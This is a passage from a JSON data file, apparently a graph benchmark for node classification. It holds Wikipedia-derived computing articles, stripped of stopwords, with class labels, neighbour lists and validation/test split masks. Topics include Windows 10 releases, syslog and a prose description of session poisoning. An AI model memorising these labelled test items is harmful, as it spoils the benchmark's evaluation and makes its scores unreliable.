    "text": "Apple_Developer:apple developer apple developer formerly apple developer connection adc apple inc. developer network designed make available resources help software developers write software macos tvos watchos ios platforms applications created xcode programs created apple inc.. ios applications uploaded app store ios watchos applications attached ios applications tvos applications uploaded app store tvos mac applications ’ common find world wide web download app store macos several leaks secret apple software prerelease program notably mac os x 10.4 tiger leaks apple sued three men allegedly leaked mac os x 10.4 prerelease builds bittorrent os x lion os x mountain lion os x mavericks leaked several times well however combat issue apple installed alert system preview builds alerting uploaded tester bittorrent system july 18 2013 intruder attempted access sensitive personal information apple developer servers information encrypted apple could guarantee information developers may accessed developer website taken maintenance thursday said undergoing maintenance sunday apple posted notice site notifying users attempted hack stated re-building servers developer system prevent happening future",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      11289,
      6186,
      6700,
      1074,
      9784,
      8253,
      576,
      8783,
      4180,
      10838,
      9826,
      5733,
      8806,
      3691,
      2676,
      119,
      7292,
      7806,
      2686,
      6783,
      10878,
      8842,
      5784,
      1177,
      4251,
      2207,
      10406,
      11430,
      171,
      2735,
      3248,
      4283,
      7869,
      708,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      231,
      2280,
      2282,
      1772,
      4844,
      10478,
      8441,
      2819,
      1290,
      9999,
      784,
      4888,
      10023,
      303,
      4399,
      10036,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2388,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      6023,
      6539,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      4532,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6265,
    "label": 2,
    "text": "Windows_10_version_history:windows 10 version history windows 10 operating system developed microsoft microsoft described windows 10 operating system service would receive ongoing updates features functionality augmented ability enterprise environments receive non-critical updates slower pace use long-term support milestones receive critical updates security patches five-year lifespan mainstream support terry myerson executive vice president microsoft windows devices group said goal model reduce fragmentation across windows platform windows 10 insider preview builds delivered insiders three different rings insiders fast ring receive updates prior slow ring might experience bugs issues insiders release preview ring receive updates version almost available public comparatively stable mainstream builds windows 10 labeled yymm yy representing two-digit year mm representing month planned release example version 1507 refers builds initially released july 2015 original version windows 10 codenamed threshold 1 retroactively named version 1507 released july 2015 carries build number 10.0.10240 microsoft stated designated release manufacturing rtm build windows 10 build 10240 described rtm build various media outlets retroactively named version 1507 microsoft per naming conventions future stable releases operating system notable changes version include final release made available windows insiders july 15 2015 followed public release july 29 2015 support version 1507 ended may 9 2017 devices current branch current branch business however devices configured receive updates current branch current branch business continued receive updates june 27 2018 windows 10 november update also known version 1511 codenamed threshold 2 first major update windows 10 second version operating system carries build number 10.0.10586 new features version windows 10 include first preview released august 18 2015 final release made available windows insiders november 3 2015 followed public release november 12 2015 unlike initial release windows branch also made available existing windows phone 8.1 devices xbox one preview release windows server 2016 pre-installed new windows 10 mobile devices support version users current branch cb current branch business cbb ended october 10 2017 last public update released april 10 2018 enterprise education versions windows 10 anniversary update also known version 1607 codenamed redstone 1 second major update windows 10 first series updates redstone codenames carries build number 10.0.14393 first preview released december 16 2015 final release made available windows insiders july 18 2016 followed public release august 2 release windows 10 supported users current branch cb current branch business cbb long-term support branch ltsb windows 10 creators update also known version 1703 codenamed redstone 2 third major update windows 10 second series updates redstone codenames carries build number 10.0.15063 first preview released insiders august 11 2016 final release made available windows insiders march 20 2017 followed public release april 5 via update assistant began roll april 11 windows 10 fall creators update also known version 1709 codenamed redstone 3 fourth major update windows 10 third series updates redstone codenames carries build number 10.0.16299 first preview released insiders april 7 2017 final release made available windows insiders september 26 2017 released public october 17 windows 10 april 2018 update also known version 1803 codenamed redstone 4 fifth major update windows 10 fourth series updates redstone codenames carries build number 10.0.17134 first preview released insiders august 31 2017 final release made available windows insiders april 16 2018 followed public release april 30 began roll may 8 windows 10 october 2018 update also known version 1809 codenamed redstone 5 sixth major update windows 10 fifth series updates redstone codenames carries build number 10.0.17763 first preview released insiders february 14 2018 update originally made available public consumers october 2 2018 rollout halted october 6 2018 due serious bug deletes users personal files updating october 9 2018 microsoft re-released update insiders stating known issues update including file deletion bug identified fixed october 25 2018 microsoft confirmed existence another bug overwrites files without confirmation extracting zip file zip bug fixed insiders october 30 2018 public rollout update resumed november 13 2018 windows 10 may 2019 update also known version 1903 codenamed 19h1 seventh major update windows 10 first use descriptive codename including year order released instead redstone threshold codename first preview released insiders opted exclusive skip ahead ring july 25 2018 update began rolling may 21 2019. notable changes may 2019 update include next feature release windows 10 codenamed 19h2 eighth major update windows 10 second use descriptive codename update intended delivered cumulative update may 2019 update first preview released insiders opted slow ring july 1 2019 next feature release windows 10 codenamed 20h1 ninth major update windows 10 third use descriptive codename first preview released insiders opted exclusive skip ahead ring february 14 2019",
    "neighbors": [
      2568,
      5643,
      4624,
      11283,
      537,
      540,
      3100,
      3102,
      8735,
      9244,
      9762,
      8227,
      8740,
      11301,
      6697,
      10281,
      1581,
      2101,
      5173,
      8757,
      10812,
      7229,
      64,
      3648,
      582,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      8798,
      3170,
      10338,
      10341,
      8296,
      617,
      5225,
      8299,
      622,
      9839,
      4210,
      7796,
      6265,
      5754,
      4731,
      636,
      7290,
      8315,
      639,
      10879,
      641,
      8841,
      651,
      6797,
      10896,
      2193,
      9874,
      2196,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      6827,
      3250,
      5300,
      9910,
      2749,
      4289,
      200,
      9420,
      10957,
      2259,
      3286,
      3289,
      4316,
      2782,
      9442,
      4836,
      4326,
      2279,
      9448,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      4356,
      11524,
      782,
      3856,
      3857,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      7970,
      5413,
      1832,
      3881,
      6441,
      10024,
      4396,
      10026,
      10029,
      7983,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      321,
      3394,
      9033,
      3922,
      11605,
      2391,
      4439,
      5465,
      11103,
      2402,
      2919,
      4458,
      6506,
      9593,
      2943,
      8576,
      3463,
      1418,
      5003,
      5004,
      1935,
      8080,
      4505,
      11677,
      929,
      4515,
      11683,
      3496,
      941,
      430,
      6062,
      9655,
      6584,
      1978,
      7615,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      467,
      4051,
      8659,
      9173,
      11221,
      1498,
      5594,
      478,
      5600,
      6114,
      6115,
      8681,
      4074,
      6637,
      9709,
      5103,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6266,
    "label": 2,
    "text": "Samsung_Wave_S8500:samsung wave s8500 samsung wave samsung wave gt-s8500 smartphone developed produced samsung electronics first smartphone run bada operating system developed samsung electronics commercially released june 1 2010 wave touchscreen phone powered samsung hummingbird cpu s5pc110 includes 1 ghz arm cortex-a8 cpu built-in powervr sgx 540 graphics engine also super amoled screen 720p high-definition video capture capabilities due shortage super amoled screens samsung released successor device called wave ii ceased production original s8500 model screen capacitive touchscreen super amoled anti-smudge oleophobic coating top scratch-resistant tempered-glass gorilla glass display screen resolution 800x480 wvga 283 ppi phone features 1 ghz soc internally contains arm cortex a8 cpu core model apple a4 processor graphics engine device powervr sgx 540 gpu said capable generating 90 million triangles per second soc used samsung galaxy phone features 5 megapixel edof camera supports 2560 x 1920 pixels along autofocus led flash geo-tagging face blink detection image stabilization touch focus etc shooting modes include beauty shot smile shot continuous panorama vintage shot camcorder able shoot hd recording 1280x720 30 fps flash well also able record slow motion video 320x240 120 fps flash wave first phone samsung linux based operating system bada meaning ocean samsung worked later versions bada 1.2 later 2.0 bada 1.2 released world phased manner designed improve stability january 2012 samsung declared planning merge bada linux-based tizen operating system developed collaboration intel despite collaboration supported wave unofficial ports android made due restrictions eventual cease development bada versions ported include android froyo gingerbread ice cream sandwich jellybean kitkat lollipop marshmallow features include a-gps 2 gb/8 gb internal storage microsdhc slot additional 32 gb also magnetometer compass proximity sensor accelerometer 5.1-channel surround sound mobile theater music recognition fake call service smart search social hub first phone support bluetooth version 3.0 radio connectivity includes bluetooth 3.0 wi-fi 802.11 b/g/n hsdpa 3.6 mbit/s phone available european/asian 3g bandings north american 3g bandings north american 3g bandings version phone limited availability available us phone first smartphone feature samsung bada operating system platform ui samsung touch-wiz 3.0 touch-wiz 3.0 like two predecessors touch-wiz 2.0 touch-wiz utilizes widgets three notable widgets pre-installed touch-wiz 3.0 daily briefing includes essential information weather finance ap mobile news schedule feeds updates buddies allows users call send texts read facebook/twitter feeds favorite contacts users allowed 10 home screens add widgets internet browsing samsung wave dolphin browser v2.0 based webkit 3.0 depends firmware version browser supports flash disabled default improve page loading speed default phone comes picsel viewer capable reading .pdf microsoft office file formats users selected countries buy download picsel office editor samsung apps samsung apps users also download applications games widgets application store software includes gps software comes phone lbs route 66 facebook twitter social hub mini diary daily briefing memo video player fm radio media browser voice recorder e-mail pre-installed asphalt 5 samsung wave supports mp3 aac aac+ e-aac+ wma amr wav mp4 mpeg4 h.263 h.264 wmv flv divx xvid mkv flac file formats also supports subtitles many countries end december 2011 operating system gradually updated bada 2.0 first official bada 2.0 version la1 bada 2.0 touchwiz ui reached version 4.0 gui completely redone included many new features full multitasking wac voice commands text-to-speech speech-to-text chaton caster new version dlna social apps new dolphin 3.0 browser download manager reviews forums",
    "neighbors": [
      10080,
      10658,
      6883,
      196,
      2852,
      487,
      9163,
      9964,
      2383,
      1776,
      7983,
      2259,
      2707,
      6391,
      10393,
      8794,
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 6267,
    "label": 7,
    "text": "Optical_mesh_network:optical mesh network optical mesh network type optical telecommunications network employing wired fiber-optic communication wireless free-space optical communication mesh network architecture optical mesh networks use fiber-optic communication operated internet service providers metropolitan regional also national international scenarios faster less error prone network architectures support backup recovery plans established networks case disaster damage failure currently planned satellite constellations aim establish optical mesh networks space using wireless laser communication transport networks underlying optical fiber-based layer telecommunications networks evolved digital cross connect system dcs -based mesh architectures 1980s sonet/sdh synchronous optical networking/synchronous digital hierarchy ring architectures 1990s dcs-based mesh architectures telecommunications carriers deployed restoration systems ds3 circuits fastar fast automatic restoration mci real time restoration rtr restoring circuits minutes network failure sonet/sdh rings carriers implemented ring protection sonet unidirectional path switched ring upsr also called sub-network connection protection scnp sdh networks sonet bidirectional line switched ring blsr also called multiplex section shared protection ring ms-spring sdh networks protecting recovering network failure 50 ms less significant improvement recovery time supported dcs-based mesh restoration key driver deployment sonet/sdh ring-based protection attempts improving and/or evolving traditional ring architectures overcome limitations trans-oceanic ring architecture defined itu-t rec g.841 p-cycles protection next-generation sonet/sdh equipment handle multiple rings ability close working protection ring side share protection capacity among rings e.g. virtual line switched ring vlsr technological advancements optical transport switches first decade 21st century along continuous deployment dense wavelength-division multiplexing dwdm systems led telecommunications service providers replace sonet ring architectures mesh-based architectures new traffic new optical mesh networks support fast recovery previously available ring networks achieving better capacity efficiency resulting lower capital cost fast recovery tens hundreds milliseconds case failures e.g. network link node failure achieved intelligence embedded new optical transport equipment allows recovery automatic handled within network part network control plane without relying external network management system optical mesh networks refer transport networks built directly mesh-like fiber infrastructure deployed metropolitan regional national international e.g. trans-oceanic areas deploying optical transport equipment capable switching traffic wavelength sub-wavelength level incoming fiber outgoing fiber addition switching wavelengths equipment typically also able multiplex lower speed traffic wavelengths transport groom traffic long equipment so-called opaque see subsection transparency finally equipment also provide recovery traffic case network failure transport networks evolve toward mesh topologies utilizing intelligent network elements optical cross-connects optical switches provisioning recovery services new approaches developed design deployment operations management mesh optical networks optical switches build companies sycamore ciena sts-1 granularity switching tellium sts-48 granularity switching deployed operational mesh networks calient built all-optical switches based 3d mems technology optical mesh networks today provide trunking capacity higher-layer networks inter-router inter-switch connectivity ip mpls ethernet-centric packet infrastructure also support efficient routing fast failure recovery high-bandwidth point-to-point ethernet sonet/sdh services several planned satellite constellations spacex starlink intended global internet provisioning aim establish optical mesh networks space constellations consisting several hundred thousand satellites use laser communication high-throughput optical inter-satellite links interconnected network architecture allows direct routing user data satellite satellite enables seamless network management continuity service optical mesh networks support establishment circuit-mode connection-oriented services multiple recovery mechanisms provide different levels protection restoration different failure modes available mesh networks channel- link- segment- path- protection common protection schemes p-cycles another type protection leverages extends ring-based protection restorationis another recovery method work complement faster protection schemes case multiple failures path-protected mesh networks connections unprotected others protected single multiple failures various ways connection protected single failure defining backup path diverse primary path taken connection mesh network backup path associated resources dedicated connection dedicated backup path protection aka dedicated 1+1 path protection subnetwork connection protection sncp sdh networks upsr sonet ring networks shared among multiple connections shared backup path protection typically ones whose primary paths likely fail time thereby avoiding contention shared resources case single link node failure number protection schemes use pre-emptible paths partially diverse backup paths implemented finally multiple diverse routes designed connection multiple recovery routes recover even multiple failures examples mesh networks across atlantic pacific oceans traditional transport networks made optical fiber-based links telecommunications offices multiple wavelengths multiplexed increase capacity fiber wavelengths terminated electronic devices called transponders undergoing optical-to-electrical conversion signal reamplification reshaping retiming 3r inside telecommunications office signals handled switched transport switch aka optical cross-connect optical switch either dropped office directed outgoing fiber link carried wavelengths multiplexed fiber link towards next telecommunications office act going optical-electrical-optical o-e-o conversion telecommunications office causes network considered opaque incoming wavelengths undergo optical-to-electrical conversion switched telecommunications office optical domain using all-optical switches also called photonic cross-connect optical add-drop multiplexer reconfigurable optical add-drop multiplexer roadm systems network considered transparent hybrid schemes leverage optical bypasses provide limited o-e-o conversions key locations across network referred translucent networks roadm-based transparent optical mesh networks deployed metropolitan regional networks since mid-2000s early 2010s operational long distance networks still tend remain opaque transmission limitations impairments prevent extension transparency beyond certain point routing key control operational aspect optical mesh networks transparent all-optical networks routing connections tightly linked wavelength selection assignment process so-called routing wavelength assignment rwa due fact connection remains wavelength end-to-end throughout network sometimes referred wavelength continuity constraint absence devices translate wavelengths optical domain opaque network routing problem one finding primary path connection protection needed backup path diverse primary path wavelengths used link independently several algorithms used combined determine primary path diverse backup path without sharing resource along backup path connection service shortest path including dijkstra algorithm k-shortest path yen algorithm edge node-diverse disjoint routing including suurballe algorithm numerous heuristics general however problems optimal routing dedicated backup path protection arbitrary shared risk link groups srlgs shared backup path protection np-complete deployment optical mesh networks enabling new services applications service providers offer customers also supports new network paradigms mesh networking general wireless mesh networking particular telecommunications networking telecommunications equipment packet networking connection-oriented networking availability",
    "neighbors": [
      5472,
      2466,
      10021,
      5321,
      9098,
      2701,
      2607,
      10799,
      2994,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 6268,
    "label": 3,
    "text": "Heterogeneous_computing:heterogeneous computing heterogeneous computing refers systems use one kind processor cores systems gain performance energy efficiency adding type processors adding dissimilar coprocessors usually incorporating specialized processing capabilities handle particular tasks usually heterogeneity context computing referred different instruction-set architectures isa main processor one processors another usually different architecture maybe one different microarchitecture floating point number processing special case usually referred heterogeneous example arm big.little exception isas cores heterogeneity refers speed different microarchitectures isa thus making like symmetric multiprocessor smp past heterogeneous computing meant different isas handled differently modern example heterogeneous system architecture hsa systems eliminate difference user using multiple processor types typically cpus gpus usually integrated circuit provide best worlds general gpu processing apart gpu well-known 3d graphics rendering capabilities also perform mathematically intensive computations large data-sets cpus run operating system perform traditional serial tasks level heterogeneity modern computing systems gradually increasing scaling fabrication technologies allows formerly discrete components become integrated parts system-on-chip soc example many new processors include built-in logic interfacing devices sata pci ethernet usb rfid radios uarts memory controllers well programmable functional units hardware accelerators gpus cryptography co-processors programmable network processors a/v encoders/decoders etc. recent findings show heterogeneous-isa chip multiprocessor exploits diversity offered multiple isas outperform best same-isa homogeneous architecture much 21 23 energy savings reduction 32 energy delay product edp amd 2014 announcement pin-compatible arm x86 socs codename project skybridge suggested heterogeneous-isa arm+x86 chip multiprocessor making heterogeneous computing systems present new challenges found typical homogeneous systems presence multiple processing elements raises issues involved homogeneous parallel processing systems level heterogeneity system introduce non-uniformity system development programming practices overall system capability areas heterogeneity include heterogeneous computing platforms found every domain computing—from high-end servers high-performance computing machines way low-power embedded devices including mobile phones tablets",
    "neighbors": [
      4098,
      7173,
      9739,
      2066,
      7699,
      11282,
      5655,
      10781,
      8231,
      1578,
      8237,
      6705,
      7218,
      4156,
      63,
      2623,
      2113,
      7234,
      3142,
      2635,
      10316,
      2638,
      6738,
      1122,
      3175,
      8815,
      630,
      8822,
      643,
      644,
      9863,
      7820,
      7313,
      154,
      2719,
      6815,
      5793,
      6818,
      8352,
      6821,
      6311,
      7852,
      9391,
      10929,
      7858,
      9911,
      9913,
      8890,
      4286,
      2241,
      9921,
      2243,
      5329,
      10966,
      731,
      11487,
      9445,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      6391,
      1784,
      249,
      10485,
      3323,
      6909,
      9472,
      1798,
      6926,
      6415,
      785,
      1298,
      5396,
      2339,
      6950,
      10023,
      810,
      3886,
      306,
      309,
      8501,
      5948,
      4928,
      8514,
      5956,
      6476,
      7505,
      9044,
      11604,
      859,
      8543,
      1376,
      1377,
      10603,
      4465,
      6004,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      8625,
      10675,
      1461,
      1462,
      1463,
      6072,
      7607,
      4030,
      1985,
      4036,
      3014,
      3025,
      466,
      1499,
      7645,
      1502,
      5090,
      995,
      4587,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 6269,
    "label": 4,
    "text": "Session_poisoning:session poisoning session poisoning also referred session data pollution session modification method exploit insufficient input validation within server application typically server application vulnerable type exploit copy user input session variables underlying vulnerability state management problem shared state race condition ambiguity use plain unprotected modifications state values session poisoning demonstrated server environments different non-malicious applications scripts share session states usage differ causing ambiguity race conditions session poisoning demonstrated scenarios attacker able introduce malicious scripts server environment possible attacker victim share web host session poisoning first discussed potentially new vulnerability class full disclosure mailing list alla bezroutchko inquired session data pollution vulnerabilities web applications new problem january 2006 however old vulnerability previously noted others classic state management issue yvan boily new /someone earlier examples vulnerabilities found major security resources/archives bugtraq e.g session pollution also covered articles php session security przemek sobstel 2007 example code vulnerable problem subject trivial attacks problem could exist software problem codice_5 designed assumption page accessed non-malicious way anyone realizes script designed able craft http request sets logon user arbitrarily alla bezroutchko discusses scenario codice_6 used two different purposes race condition demonstrated reset scripts could exploited change logged user arbitrarily alla bezroutchko discusses examples observed development forums allows writing arbitrary session variables first example _get something probably selection box similar attack becomes codice_7 known enable security vulnerabilities several applications php server administrators recommended disable feature note real-world examples session poisoning enabled register_globals publicly demonstrated back july 2001 article serious security hole mambo site server version 3.0.x second example /someone vulnerable attack becomes 'unknown uw-team.org discusses scenario attacker victim shares php server attack fairly easy attack requires victim attacker share php server attack dependent victim attacker virtual hostname trivial attacker move session identifier cookie one cookie domain another",
    "neighbors": [
      6184,
      3473,
      10466,
      8644
    ],
    "mask": "None"
  },
  {
    "node_id": 6270,
    "label": 6,
    "text": "TeraCopy:teracopy teracopy freemium file transfer utility designed alternative built-in windows explorer file transfer feature focus data integrity file transfer reliability ability pause resume file transfers teracopy uses dynamically adjusted buffers reduce seek times asynchronous copy speeds file transfer two physical hard drives processes paused resumed case transfer errors teracopy try several times skips faulty file proceeds rest operation teracopy also shows failed file transfers allows user fix problem recopy problematic files teracopy offers explanation skipped files simply reports skipped may skip copying numerous reasons user could correct known too-long file name teracopy replace windows explorer copy move functions author asserts full unicode support teracopy example freemium licensing model basic edition offered freeware may used non-commercial environments teracopy pro shareware version utility adds additional features list favorite folders used copy destination ability modify copy queue 2007 ionut ilascu softpedia.com commended utility ability error recovery functionality concluded teracopy lot faster windows explorer xp proper defragmentation vista moves tad slower even defragmentation disk performed 2009 jason fitzpatrick lifehacker praised usability stating n't overwhelm plethora settings options also called advanced enough subsequently lifehacker visitors voted teracopy large margin best windows file copier four contestants 2010 review cnet called nifty piece freeware recommended windows users",
    "neighbors": [
      9121,
      5380,
      106,
      5356,
      7983,
      10101
    ],
    "mask": "Test"
  },
  {
    "node_id": 6271,
    "label": 2,
    "text": "List_of_BlackBerry_products:list blackberry products following partial list blackberry products blackberry line wireless handheld devices first introduced 1996 manufactured canadian company blackberry formerly known research motion rim two-way pager models thumb keyboards thumbwheel scrolling monochrome text display first model inter ctive pager announced september 18 1996 within year yankee group estimating devices like inter ctive pager use fewer 400,000 people expected two-way wireless messaging services attract 51 million users 2002 provided e-mail wap services limited html access provided via third party software wolfetech pocketgenie goamerica browser built use two 1g data-only packet switched networks mobitex datatac support java without use java virtual machine add-on models first blackberry models built-in mobile phone first models natively ran java transmitted data normal 2g cellular network rim began advertise devices email-capable mobile phones rather two-way pagers time primary market still businesses rather consumers 5810 released march 4 2002 aberration list 5790 released much later date niche model 2004 many color blackberry models non-phone blackberry made available due demand java-based model could run mobitex data-only network 5810/5820 shared physical casing keyboard layout earlier 957 device 6000 series launched 2003 6210 entering influential time time 100 gadgets list 2003 monochrome models revised include color screen retaining form factor casing early color models 7230 typically used dim electroluminescent backlight leading initial reputation poor image quality later color models 7290 typically used led backlight yielding much better screen quality color lcd screens used series either reflective transflective screens yielded better image quality direct sunlight even backlight turned nearly models list 16 mb models bluetooth model 32 mb bluetooth 7290 last model released early blackberry form factor first blackberry model bluetooth 7290 also first quad-band blackberry aberration list 7270 first wi-fi blackberry released later built old form factor vein 7200 series rim expanded market introducing first blackberry models without discrete qwerty keyboard candybar form factor developed predictive text technology called suretype qwerty-like layout using two keys per button using two letters per button rather three letters per button t9 using ten-digit keypads predictive text accuracy could improved dramatically use qwerty-like layout took advantage people memory computer keyboard since button roughly relative key time size blackberry could dramatically reduced keyboards needed 5-buttons wide rather 10-buttons wide blackberries became popular mass market became similarly sized competing consumer-market cellphones models among first blackberry models aggressively marketed consumers rather businesses rim continued manufacture qwerty models give market choice traditional qwerty thumb keyboard compressed suretype keyboard beginning 8700-series models 2006 rim began aggressively add consumer features blackberry models aim capture consumer market competitors treo motorola q progression models additions include better quality screens memory built-in chat software first cameraphone microsd memory card slot built-in mapping software consumer-specific features blackberry pearl 8100 first blackberry without trackwheel replaced miniature trackball enable full 4-way mouse-style navigation blackberry look new trackball gave pearl name 9000 series launched 2008",
    "neighbors": [
      2208,
      9408,
      2892,
      3949,
      5677,
      9101,
      3152,
      5875,
      410,
      10619,
      9341
    ],
    "mask": "Test"
  },
  {
    "node_id": 6272,
    "label": 4,
    "text": "The_Project_Formerly_Known_As_Kindle_Forkbomb:project formerly known kindle forkbomb project project formerly known kindle forkbomb work done swiss-austrian-american duo known ubermorgen artists known creative use digital media combined means performance various offline medium convey ideas project showcased ubermorgen website www.uuuuuuuntitled.com project name project formerly known kindle forkbomb broken better understand meaning behind work forkbomb term used computing describing attack computer process continuously self-replicates machine resources depleted system crashes art project depicts machine process strips comments youtube uses algorithm compile comments finally titling work video title respective uploader make book book uploaded kindle publishing service placed kindle store machine monitors books making sure enough sales made keep alive store n't thriving store machine directed purchase copies thus prolonging shelf-life using process artists message intent show easily could clog store rapidly multiplying number books hence kindle forkbomb example critique digital world problems poses merely demonstration makes easier visualize world live ubermorgen describes media created human-machine combination creation new genre decentralized fiction writing artist group says books compressed form contemporary world describe snapshot frozen time type work form art sometimes referred uncreative spurred famous writer kenneth goldsmith efforts uncreative writing examples works produced project one thing note cover books feature uploader video title underneath everything text string bash shell version computer forkbomb following reference link takes website aloud read full pdf version books one project similar stephanie barber american artist uses many forms media art project relates kindle forkbomb book titled night moves book grouping youtube comments bob seger song night moves",
    "neighbors": [
      11351
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6273,
    "label": 5,
    "text": "Syslog:syslog computing syslog standard message logging allows separation software generates messages system stores software reports analyzes message labeled facility code indicating software type generating message assigned severity level computer system designers may use syslog system management security auditing well general informational analysis debugging messages wide variety devices printers routers message receivers across many platforms use syslog standard permits consolidation logging data different types systems central repository implementations syslog exist many operating systems syslog developed 1980s eric allman part sendmail project readily adopted applications since become standard logging solution unix-like systems variety implementations also exist operating systems commonly found network devices routers syslog originally functioned de facto standard without authoritative published specification many implementations existed incompatible internet engineering task force documented status quo rfc 3164 standardized rfc 5424 various companies attempted claim patents syslog implementations little effect use standardization protocol information provided originator syslog message includes facility code severity level syslog software adds information information header passing entry syslog receiver components include originator process id timestamp hostname ip address device facility code used specify type program logging message messages different facilities may handled differently list facilities available defined standard mapping facility code keyword uniform different operating systems syslog implementations list severities also defined standard meaning severity levels emergency debug relative application example purpose system process transactions update customer account balance information error final step assigned alert level however error occurring attempt display zip code customer may assigned error even warning level server process handles display messages usually includes lower severe levels display less severe levels requested messages separated individual severity warning level entry also included filtering notice info debug messages rfc 3164 message component known msg specified fields tag name program process generated message content contains details message described rfc 5424 msg called content rfc 3164 tag part header single field tag split app-name procid msgid totally resemble usage tag provides functionality cases popular syslog tools rsyslog conform new standard content field encoded utf-8 character set octet values traditional ascii control character range avoided generated log messages may directed various destinations including console files remote syslog servers relays implementations provide command line utility often called logger well software library send messages log display monitor collected logs one needs use client application access log file directly system basic command line tools tail grep log servers configured send logs network addition local files implementations include reporting programs filtering displaying syslog messages operating network syslog uses client-server architecture server listens well-known registered port protocol requests clients historically common transport layer protocol network logging user datagram protocol udp server listening port 514 udp lacks congestion control mechanisms support transport layer security required implementations recommended general use transmission control protocol tcp port 6514 since process application operating system written independently little uniformity payload log message reason assumption made formatting contents syslog message formatted rfc 5424 gives augmented backus–naur form abnf definition msg field network protocol simplex communication means acknowledging delivery originator various groups working draft standards detailing use syslog network security event logging proposed application within healthcare environment regulations sarbanes-oxley act pci dss hipaa many others require organizations implement comprehensive security measures often include collecting analyzing logs many different sources syslog format proven effective consolidating logs many open-source proprietary tools reporting analysis logs utilities exist conversion windows event log log formats syslog managed security service providers attempt apply analytical techniques artificial intelligence algorithms detect patterns alert customers problems syslog protocol defined request comments rfc documents published internet engineering task force internet standards following list rfcs define syslog protocol",
    "neighbors": [
      516,
      2312,
      11147,
      142,
      5397,
      11413,
      1561,
      9625,
      7967,
      4640,
      8487,
      10924,
      5045,
      3133,
      2878,
      8637,
      961,
      4033,
      6213,
      10437,
      6990,
      6993,
      8533,
      2390,
      472,
      2656,
      8933,
      8295,
      10604,
      2801,
      5874,
      6650
    ],
    "mask": "Test"
  },
  {
    "node_id": 6274,
    "label": 0,
    "text": "Grammar_induction:grammar induction grammar induction grammatical inference process machine learning learning formal grammar usually collection re-write rules productions alternatively finite state machine automaton kind set observations thus constructing model accounts characteristics observed objects generally grammatical inference branch machine learning instance space consists discrete combinatorial objects strings trees graphs grammatical inference often focused problem learning finite state machines various types see article induction regular languages details approaches since efficient algorithms problem since 1980s since beginning century approaches extended problem inference context-free grammars richer formalisms multiple context-free grammars parallel multiple context-free grammars classes grammars grammatical inference studied contextual grammars pattern languages simplest form learning learning algorithm merely receives set examples drawn language question aim learn language examples rarely counter-examples example belong language however learning models studied one frequently studied alternative case learner ask membership queries exact query learning model minimally adequate teacher model introduced angluin wide variety methods grammatical inference two classic sources also devote brief section problem cite number references basic trial-and-error method present discussed approaches infer subclasses regular languages particular see induction regular languages recent textbook de la higuera 2010 covers theory grammatical inference regular languages finite state automata d'ulizia ferri grifoni provide survey explores grammatical inference methods natural languages method proposed section 8.7 suggests successively guessing grammar rules productions testing positive negative observations rule set expanded able generate positive example given rule set also generates negative example must discarded particular approach characterized hypothesis testing bears similarity mitchel version space algorithm text provide simple example nicely illustrates process feasibility unguided trial-and-error approach substantial problems dubious grammatical induction using evolutionary algorithms process evolving representation grammar target language evolutionary process formal grammars easily represented tree structures production rules subjected evolutionary operators algorithms sort stem genetic programming paradigm pioneered john koza early work simple formal languages used binary string representation genetic algorithms inherently hierarchical structure grammars couched ebnf language made trees flexible approach koza represented lisp programs trees able find analogues genetic operators within standard set tree operators example swapping sub-trees equivalent corresponding process genetic crossover sub-strings genetic code transplanted individual next generation fitness measured scoring output functions lisp code similar analogues tree structured lisp representation representation grammars trees made application genetic programming techniques possible grammar induction case grammar induction transplantation sub-trees corresponds swapping production rules enable parsing phrases language fitness operator grammar based upon measure well performed parsing group sentences target language tree representation grammar terminal symbol production rule corresponds leaf node tree parent nodes corresponds non-terminal symbol e.g noun phrase verb phrase rule set ultimately root node might correspond sentence non-terminal like greedy algorithms greedy grammar inference algorithms make iterative manner decisions seem best stage decisions made usually deal things like creation new rules removal existing rules choice rule applied merging existing rules several ways define 'the stage 'the best also several greedy grammar inference algorithms context-free grammar generating algorithms make decision every read symbol context-free grammar generating algorithms first read whole given symbol-sequence start make decisions recent approach based distributional learning algorithms using approaches applied learning context-free grammars mildly context-sensitive languages proven correct efficient large subclasses grammars angluin defines pattern string constant symbols σ variable symbols disjoint set language pattern set nonempty ground instances i.e strings resulting consistent replacement variable symbols nonempty strings constant symbols pattern called descriptive finite input set strings language minimal respect set inclusion among pattern languages subsuming input set angluin gives polynomial algorithm compute given input string set descriptive patterns one variable x end builds automaton representing possibly relevant patterns using sophisticated arguments word lengths rely x variable state count drastically reduced erlebach et al give efficient version angluin pattern learning algorithm well parallelized version arimura et al show language class obtained limited unions patterns learned polynomial time pattern theory formulated ulf grenander mathematical formalism describe knowledge world patterns differs approaches artificial intelligence begin prescribing algorithms machinery recognize classify patterns rather prescribes vocabulary articulate recast pattern concepts precise language addition new algebraic vocabulary statistical approach novel aim broad mathematical coverage pattern theory spans algebra statistics well local topological global entropic properties principle grammar induction applied aspects natural language processing applied among many problems semantic parsing natural language understanding example-based translation morpheme analysis place name derivations grammar induction also used lossless data compression statistical inference via minimum message length mml minimum description length mdl principles grammar induction also used probabilistic models language acquisition",
    "neighbors": [
      1890,
      10114,
      1956,
